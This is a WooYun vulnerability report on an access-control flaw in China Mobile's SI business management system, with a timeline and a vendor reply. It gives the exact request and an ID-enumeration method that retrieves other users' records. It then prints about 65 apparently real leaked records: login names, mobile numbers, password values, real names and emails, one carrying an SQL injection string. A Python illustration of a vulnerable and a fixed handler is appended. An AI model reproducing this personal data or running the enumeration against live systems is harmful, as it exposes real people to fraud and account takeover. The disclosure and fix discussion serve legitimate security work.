China Mobile SI business management system vulnerability can affect a large number of users' information (account / name / mobile / email / password, etc.)

ID: 215025
Url: http://www.wooyun.org/bug.php?action=view&id=215025
Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling
Title: China Mobile SI business management system vulnerability can affect a large number of users' information (account / name / mobile / email / password, etc.)
Type: design flaw / logic error
Vendor: China Mobile
White hat: BMa
Submitted: 2016-06-01 14:04:00
Published: 2016-07-18 10:50:00
Fixed: (not set)
Confirmed: 2016-06-03 00:00:00
Confirm spend: 2
Tags:
Followers: 0
Bookmarks: 0
White-hat rating:
White-hat self-assessed rank: 15
Vendor rating:
Vendor-assessed rank: 7
Summary
All user information leaked: account, name, mobile, email, password
Details

After registering an account at http://**.**.**.**/si/portal/register.jsp:

[screenshot: 3.png]


The profile-edit page then issues the following request. Note that the ticket parameter in the body carries the same value as the JSESSIONID cookie, and that the record to return is selected purely by the client-supplied department.departmentId:

POST /server/auth/findDepartment.action HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/si/auth/individual/modifyInfo.jsp
Content-Length: 81
Cookie: JSESSIONID=1A377EC122C2A8227B6A7CF45563F33D
X-Forwarded-For: **.**.**.**
Connection: close

department.departmentId=1016481&ticket=1A377EC122C2A8227B6A7CF45563F33D&domain=si


The department.departmentId value can then be enumerated while the ticket stays fixed; every id that exists returns that user's record:

[screenshot: 1.png]


Leaked information. The column layout below is that of a Burp Intruder results export: Payload is the departmentId that was tried, and the quoted fields are the values extracted from each JSON response. The password column is base64 of 16 bytes; whether that is a hash or reversible ciphertext is not stated in the report.

[screenshot: 2.png]


Payload (department.departmentId)	"loginName":"	"mobile":"	"password":"	"realName":"	"email":"	Comment
1016621 进学科技 18813396658 CeISzPMC2oO4nU9WFUNQ\/Q== 进学科技 [email protected]**.**.**.**
1016301 讯宇创世 13621097201 iGlWz5LuREiprjVCAiHbiA== 北京讯宇创世科技有限公司 [email protected]**.**.**.**
1016681 测试1006 15815352980 ZDIaYXYBbhr8cpDG5tY+8Q== 测试账号 [email protected]**.**.**.**
1016723 泉龙达科技 13516205707 KJbjdP5gykFLm0JWvvWUzg== quanlongda [email protected]**.**.**.**
1016722 泉龙达 13516205707 7lc6DxnLTqqVJMY+wZVgOg== quanlongda [email protected]**.**.**.**
1016421 企业闪信-景心 15022201502 qHg+qyGTkbDWbP2gxyVccw== 裴玲艳 [email protected]**.**.**.**
1016781 zhubing1225 13668676669 P9nDLMzDErI69q4hVisVQw== 122500 [email protected]**.**.**.**
1016161 zhongxingwangka 13602128111 Y4V1f1qAiVE+OF7bgS8LNg== zhongxingwangka [email protected]**.**.**.**
1016361 zhaoxfa 18832684116 7X110ojWIOFodjucaMA\/lQ== 赵小飞 [email protected]**.**.**.**
1015901 zhangwei 15218848009 6QwNLmgNjG69\/1M\/8klGbA== zhangwei [email protected]**.**.**.**' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--
1015841 z123456 18896724354 o9vP55LnoGaqBWQVy3qmnA== z123456 [email protected]**.**.**.**
1015922 yanduwei 13911943880 S5dxthIwcYbfpEc9Its39A== yanduwei [email protected]**.**.**.**
1016061 wshh2008 15182011250 ZOzKC39Bp4pXpQj3giWdpQ== haha [email protected]**.**.**.**
1016102 wenhao 13548839276 nQ4E\/Zs2tm4Ocr72v2GR3g== wenhao [email protected]**.**.**.**
1016263 wangqihua 15880229257 QREKrGkgkylK61Mcy209WQ== 中国移动通信福建有限公司 [email protected]**.**.**.**
1016541 tjsckj 13622132507 GgLpX94IDfj7ZF\/DlE0uNQ== shengchuang [email protected]**.**.**.**
1016121 tester017 13148375348 ixs3lKoOJQT3Hxu6hRgZTg== tester017 [email protected]**.**.**.**
1016463 test2 15294567856 rX\/QAx5z67PYIq6XIPjqpg== test2 [email protected]**.**.**.**
1015881 test123456 13434231234 XsS48YTyTRBeUcespeyHvg== masaya [email protected]**.**.**.**
1015941 test1 15034518061 4uieWn2tMmSiIX8omL14Pw== 发送到 [email protected]**.**.**.**
1016701 szsqld 13554915786 Y7v2SyFEqFG1eufU1sXVYA== 深圳市泉龙达科技发展有限公司 135549157[email protected]**.**.**.**
1016783 sunzhix 15263321415 K\/Zo5bqjwKhmFEkFCG13Pg== 孙志祥 [email protected]**.**.**.**
1016721 slyslan 15060316212 8gB+t71sH8eWIKk4XYVNww== slyslan [email protected]**.**.**.**
1016201 sis1975 13904513134 Q8kPHlN2XNdd86iPRUrcIg== 网络运营 [email protected]**.**.**.**
1016801 sim_admin 13718580212 944t\/HSlXQWSado+0S65Ig== sunyu [email protected]**.**.**.**
1016401 shenhongjian 13967225961 7OC3UfnoeZdzrWeMamdqUA== shenhongjian [email protected]**.**.**.**
1016822 nstest2 13811111111 i4ZCznTk8jYEE8U5UeFFHQ== nstest2 [email protected]**.**.**.**
1016821 nstest 13811111111 vj3dBP1vke26OaY035OU2Q== nstest2 [email protected]**.**.**.**
1015782 nbl1986 15000554866 V1McDH8ucD8cSJnCkIHhnQ== 1 [email protected]**.**.**.**
1016841 mykjava2 13825612079 kF4uWtkMQWpgr24YrOLUHw== mykjava2 [email protected]**.**.**.**
1016181 lywswyk 13583108972 Cy\/kwQ8fPM6VdWW0EAR2Aw== lywswyk [email protected]**.**.**.**
1016601 loveCS1763 13528212007 bZYR3bAiKD8mnWjVWm6IJQ== loveCS1763 [email protected]
1016521 lirk.jsyt 13956325007 pjenJK3ie5ADYbMJPJQ4SQ== jeoco_lirk [email protected]**.**.**.**
1016381 kissxxzz 13911139733 Qt3leMO0Xbx+9HQv\/2RfWA== hlj [email protected]**.**.**.**
1016661 jiaoxiang 18252121859 rgCNC+6JsRER7V2Ih9+oZg== jiaoxiang [email protected]**.**.**.**
1015981 jiangsenxing 15961705638 9oDaCo20G5XHm70+RHsfiw== 蒋森兴 [email protected]**.**.**.**
1016281 hujiashun 18858360175 4z0q16ok0ljeAoG8dEuFww== hujiashun [email protected]**.**.**.**
1016441 hubeillwy 13995777715 FG7VXATANx29\/Lizvv5jcw== 湖北联利伟业 [email protected]**.**.**.**
1016561 huangxiaohui 13849612123 GQ6723zegGniaHl\/5IXerg== huangxiaohui [email protected]**.**.**.**
1016782 huanggua 15911111111 xr\/Bxseo87VIvw3A7eBKug== huanggua [email protected]**.**.**.**
1016241 heshiwo 13521202355 fZ3qfNYQZ5PsxaiG7Q\/oAA== heshiwo [email protected]**.**.**.**
1016641 djl1122 15285911190 CIkHWubsPdFDSXY1Xxmg+w== 抢油 [email protected]**.**.**.**
1015801 cla2101 18852486269 Z+e3Zzc6Yh22OnaW7+Ze8g== 书生 [email protected]**.**.**.**
1016101 cj858cj 15010028119 e37s9S4CmnPbM2JQ0Ku2qA== 陈金秋 [email protected]**.**.**.**
1016461 chongfeng 13926600450 NlUEqqQuKLk7mNXqJEeLkA== chongfeng [email protected]**.**.**.**
bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 [email protected]**.**.**.**
1016861 bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 [email protected]**.**.**.**
1015961 ak47 15219118952 Ywr4HoEQE3ZShShgAexIXg== ak47 [email protected]**.**.**.**
1016462 adminaa 15189658965 ijxvJr0NAd8VumT\/io4edA== adminaa [email protected]**.**.**.**
1016262 admin2 15845454545 3N5INq8n64wdMAes78F9Vg== 123 [email protected]**.**.**.**
1016321 admin1 13875467890 OoJxQp8a\/Osl1k7Rwfw33A== 1234532 [email protected]**.**.**.**
1015921 aa17951 15929807202 p6VBBpZ7noQxT05+UazKow== aaqqww [email protected]**.**.**.**
1016042 979091907 13936027352 T5AizXVVPQnxflzuIdXJjg== 李强 [email protected]**.**.**.**
1016581 2766118665 18216678939 6Nr7KvQNnyOO7A6XN6gO3Q== 诸城代理商 [email protected]**.**.**.**
1016001 204930 15049133333 Fv7M4AmS8NsJOvZyuqv\/RA== 204930 [email protected]**.**.**.**
1016041 1q 13843723521 Isv+O\/af0mXsFxFFXmAuOA== q1 [email protected]**.**.**.**
1016761 1979376171 15845317539 XS\/EFF3H+Z+\/L8NwTiuIVQ== Sunday [email protected]**.**.**.**
1016081 18799889778 13899159892 QDjuS2h2mwhrNaRiKlVbuw== 18799889778 [email protected]
1016021 18701256780 15229393711 b7JzgOV3gNp7bYRu4qzbrA== 武三刚 [email protected]**.**.**.**
1015821 18283823693 18283823693 khHcAZllpIHxxA4FgBZoMw== shimin [email protected]**.**.**.**
1016261 15880228257 15845454545 e+LNiQQBEIpF3EuFTgzIwg== admin2' [email protected]**.**.**.**
1016501 15834726140 15834726140 ltDPXYKN59kguPW7jdN\/Kg== 李佳霖 [email protected]
1016221 15138776956 15138776956 sQIowoMKkEalUtSE\/dgAqQ== 谷旭娜 [email protected]**.**.**.**
1016741 13516003391 13516003391 r7Y3VOhGxCwrBRDplDATVQ== z1290421091 [email protected]**.**.**.**
1016141 13479690747 13479690747 VbIVJswIvOwd891tYMuOKw== 承诺 [email protected]**.**.**.**
1015861 13476003630 13476003630 SKQ5Kv1PRPbw3wdq\/s57vA== sgz [email protected]**.**.**.**
1016341 123 13800013800 ZKzJWdQgEP9LW8qI1MfPWA== 123 [email protected]**.**.**.**
1016481 1005011194 15825928568 OFpxWgDuOXocWWm\/dZBiUA== Andy [email protected]**.**.**.**

POC

Fix recommendation
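The report leaves this section empty. As an added illustration (example code written for this page, not code from the report or from the affected system, whose server-side implementation is not shown), the following Python models the findDepartment.action lookup as observed above: the vulnerable handler returns whatever department.departmentId is sent alongside a valid ticket, the hardened handler resolves the record from the session instead, and enumerate_departments does what the Intruder run in the report does. All accounts, the session store, the handler names and the response shape are constructed assumptions; only the field names (loginName, mobile, password, realName, email), the ticket value and the id stride are taken from the report.

```python
import base64
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass(frozen=True)
class Account:
    department_id: int
    login_name: str
    mobile: str
    password: str  # stored the way the page shows it: base64 of 16 opaque bytes
    real_name: str
    email: str


def _pw(seed: int) -> str:
    # Constructed stand-in for the stored password field: 16 bytes, base64-encoded,
    # the same shape as the values in the report (22 characters plus "==").
    return base64.b64encode(bytes([(seed * 37 + i) % 256 for i in range(16)])).decode()


# Constructed sample data (assumption). Ids follow the stride seen in the
# report (... 1016441, 1016461, 1016481 ...); 1016861 stands in for the tester's own account.
ACCOUNTS: Dict[int, Account] = {
    1016441: Account(1016441, "userA", "13900000001", _pw(1), "User A", "a@example.invalid"),
    1016461: Account(1016461, "userB", "13900000002", _pw(2), "User B", "b@example.invalid"),
    1016462: Account(1016462, "userC", "13900000003", _pw(3), "User C", "c@example.invalid"),
    1016481: Account(1016481, "userD", "13900000004", _pw(4), "User D", "d@example.invalid"),
    1016861: Account(1016861, "bma123", "18800000000", _pw(5), "Tester", "bma@example.invalid"),
}

# Constructed session store (assumption): ticket -> department id of the logged-in caller.
# The ticket is the JSESSIONID value the request in the report reuses in its body.
SESSIONS: Dict[str, int] = {"1A377EC122C2A8227B6A7CF45563F33D": 1016861}

Record = Dict[str, str]
Handler = Callable[[str, int], Optional[Record]]


def find_department_vulnerable(ticket: str, department_id: int) -> Optional[Record]:
    """Models the observed behaviour: the ticket proves only that *someone* is logged in;
    whatever department.departmentId the client sends is looked up and returned in full."""
    if ticket not in SESSIONS:
        return None
    acct = ACCOUNTS.get(department_id)
    if acct is None:
        return None
    return {"loginName": acct.login_name, "mobile": acct.mobile,
            "password": acct.password, "realName": acct.real_name, "email": acct.email}


def mask_mobile(mobile: str) -> str:
    """Return only the leading 3 and trailing 4 digits of a mobile number."""
    return mobile[:3] + "****" + mobile[-4:] if len(mobile) >= 7 else "***"


def find_department_fixed(ticket: str, department_id: int) -> Optional[Record]:
    """Hardened variant: the record is resolved from the session, the client-supplied id
    must match the caller's own, and the password field never leaves the server."""
    owner = SESSIONS.get(ticket)
    if owner is None or owner != department_id:
        return None  # the real handler would answer 403 here
    acct = ACCOUNTS[owner]
    return {"loginName": acct.login_name, "mobile": mask_mobile(acct.mobile),
            "realName": acct.real_name, "email": acct.email}


def enumerate_departments(handler: Handler, ticket: str, start: int, stop: int) -> Dict[int, Record]:
    """What the Intruder run in the report does: walk the id space with one valid
    session and keep every id that comes back with a record."""
    hits: Dict[int, Record] = {}
    for dept_id in range(start, stop):
        rec = handler(ticket, dept_id)
        if rec is not None:
            hits[dept_id] = rec
    return hits


def stored_password_len(b64: str) -> int:
    """Decode a value from the report's password column and return its byte length."""
    return len(base64.b64decode(b64))


if __name__ == "__main__":
    ticket = "1A377EC122C2A8227B6A7CF45563F33D"
    leaked = enumerate_departments(find_department_vulnerable, ticket, 1016400, 1016900)
    print(f"vulnerable handler: {len(leaked)} records, every one including a password field:",
          all("password" in r for r in leaked.values()))
    safe = enumerate_departments(find_department_fixed, ticket, 1016400, 1016900)
    print(f"fixed handler: {len(safe)} record(s):", safe)
```

Two properties of the hardened handler are the ones a real fix needs to keep: the record is chosen from the server-side session identity, never from a value in the request body, and the response omits the password field altogether, since no client flow needs it regardless of how it is stored.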

Status history:
2016-06-01: details sent to the vendor, awaiting vendor handling
2016-06-03: vendor confirmed; details visible to the vendor only
2016-06-13: details opened to core white hats and domain experts
2016-06-23: details opened to regular white hats
2016-07-03: details opened to intern white hats
2016-07-18: details opened to the public
Vendor reply: CNVD could not reproduce the described behaviour; the report has been passed via CNCERT to China Mobile Group, which will coordinate handling with the site's management department.
Response: severity: medium; Rank: 7; confirmed: 2016-06-03 10:48
Comment | Commenter | Likes | Time

I always thought you were with China Mobile too.

李旭敏 | 0 | 2016-06-03 11:41:00